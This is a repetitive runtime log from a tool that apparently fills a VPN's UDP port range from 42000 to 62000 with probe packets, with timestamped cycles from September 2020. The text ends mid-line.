7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Starting port fill at 2020-09-06 04:29:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:29:04 +Starting port fill at 2020-09-06 04:30:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:30:05 +Starting port fill at 2020-09-06 04:31:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:31:06 +Starting port fill at 2020-09-06 04:32:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:32:04 +Starting port fill at 2020-09-06 04:33:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:33:04 +Starting port fill at 2020-09-06 04:34:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:34:06 +Starting port fill at 2020-09-06 04:35:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:35:07 +Starting port fill at 2020-09-06 04:36:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:36:05 +Starting port fill at 2020-09-06 04:37:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:37:05 +Starting port fill at 2020-09-06 04:38:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:38:05 +Starting port fill at 2020-09-06 04:39:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 